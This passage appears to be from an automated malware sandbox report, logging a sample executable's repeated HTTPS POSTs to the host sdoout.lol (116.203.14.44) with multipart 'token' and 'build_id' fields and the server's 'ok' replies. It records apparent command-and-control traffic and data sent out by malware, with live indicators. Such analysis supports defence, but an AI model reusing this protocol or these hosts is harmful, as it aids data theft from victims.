                                                                                                                                                                                                                                                                                          2024-12-30 14:56:20 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------tr1ng4ozmyusrqq9zua1Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------tr1ng4ozmyusrqq9zua1Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------tr1ng4ozmyusrqq9zua1Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:20 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          73192.168.2.954001116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:21 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----tr1ng4ozmyusrqq9zua1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:21 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------tr1ng4ozmyusrqq9zua1Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------tr1ng4ozmyusrqq9zua1Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------tr1ng4ozmyusrqq9zua1Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:21 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          74192.168.2.954002116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:22 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----68yukfusrqq9rim79hv3
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:22 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 68 76 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 68 76 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 68 76 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------68yukfusrqq9rim79hv3Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------68yukfusrqq9rim79hv3Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------68yukfusrqq9rim79hv3Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:22 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          75192.168.2.954003116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:23 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----sriwlnycjm79zmglf379
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:23 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 73 72 69 77 6c 6e 79 63 6a 6d 37 39 7a 6d 67 6c 66 33 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 73 72 69 77 6c 6e 79 63 6a 6d 37 39 7a 6d 67 6c 66 33 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 73 72 69 77 6c 6e 79 63 6a 6d 37 39 7a 6d 67 6c 66 33 37 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------sriwlnycjm79zmglf379Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------sriwlnycjm79zmglf379Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------sriwlnycjm79zmglf379Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:23 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          76192.168.2.954004116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:24 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----a1vsriwtjm7g47q90hln
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:24 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 61 31 76 73 72 69 77 74 6a 6d 37 67 34 37 71 39 30 68 6c 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 61 31 76 73 72 69 77 74 6a 6d 37 67 34 37 71 39 30 68 6c 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 61 31 76 73 72 69 77 74 6a 6d 37 67 34 37 71 39 30 68 6c 6e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------a1vsriwtjm7g47q90hlnContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------a1vsriwtjm7g47q90hlnContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------a1vsriwtjm7g47q90hlnCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:24 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          77192.168.2.954006116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:25 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ekf37ym79ri5f37gvkfc
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1829
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:25 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 65 6b 66 33 37 79 6d 37 39 72 69 35 66 33 37 67 76 6b 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 65 6b 66 33 37 79 6d 37 39 72 69 35 66 33 37 67 76 6b 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 65 6b 66 33 37 79 6d 37 39 72 69 35 66 33 37 67 76 6b 66 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ekf37ym79ri5f37gvkfcContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ekf37ym79ri5f37gvkfcContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ekf37ym79ri5f37gvkfcCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:25 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          78192.168.2.954008116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:26 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ekf37ym79ri5f37gvkfc
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:26 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 65 6b 66 33 37 79 6d 37 39 72 69 35 66 33 37 67 76 6b 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 65 6b 66 33 37 79 6d 37 39 72 69 35 66 33 37 67 76 6b 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 65 6b 66 33 37 79 6d 37 39 72 69 35 66 33 37 67 76 6b 66 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ekf37ym79ri5f37gvkfcContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ekf37ym79ri5f37gvkfcContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ekf37ym79ri5f37gvkfcCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:26 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          79192.168.2.954011116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:27 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----uk6f3euasjecbiw4ohdt
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:27 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 75 6b 36 66 33 65 75 61 73 6a 65 63 62 69 77 34 6f 68 64 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 75 6b 36 66 33 65 75 61 73 6a 65 63 62 69 77 34 6f 68 64 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 75 6b 36 66 33 65 75 61 73 6a 65 63 62 69 77 34 6f 68 64 74 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------uk6f3euasjecbiw4ohdtContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------uk6f3euasjecbiw4ohdtContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------uk6f3euasjecbiw4ohdtCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:27 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          80192.168.2.954012116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:28 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7gv37q9zcbasriwtrimy
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:28 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 37 67 76 33 37 71 39 7a 63 62 61 73 72 69 77 74 72 69 6d 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 37 67 76 33 37 71 39 7a 63 62 61 73 72 69 77 74 72 69 6d 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 37 67 76 33 37 71 39 7a 63 62 61 73 72 69 77 74 72 69 6d 79 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------7gv37q9zcbasriwtrimyContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------7gv37q9zcbasriwtrimyContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------7gv37q9zcbasriwtrimyCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:28 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          81192.168.2.954013116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:29 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7gv37q9zcbasriwtrimy
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:29 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 37 67 76 33 37 71 39 7a 63 62 61 73 72 69 77 74 72 69 6d 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 37 67 76 33 37 71 39 7a 63 62 61 73 72 69 77 74 72 69 6d 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 37 67 76 33 37 71 39 7a 63 62 61 73 72 69 77 74 72 69 6d 79 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------7gv37q9zcbasriwtrimyContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------7gv37q9zcbasriwtrimyContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------7gv37q9zcbasriwtrimyCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:29 GMT
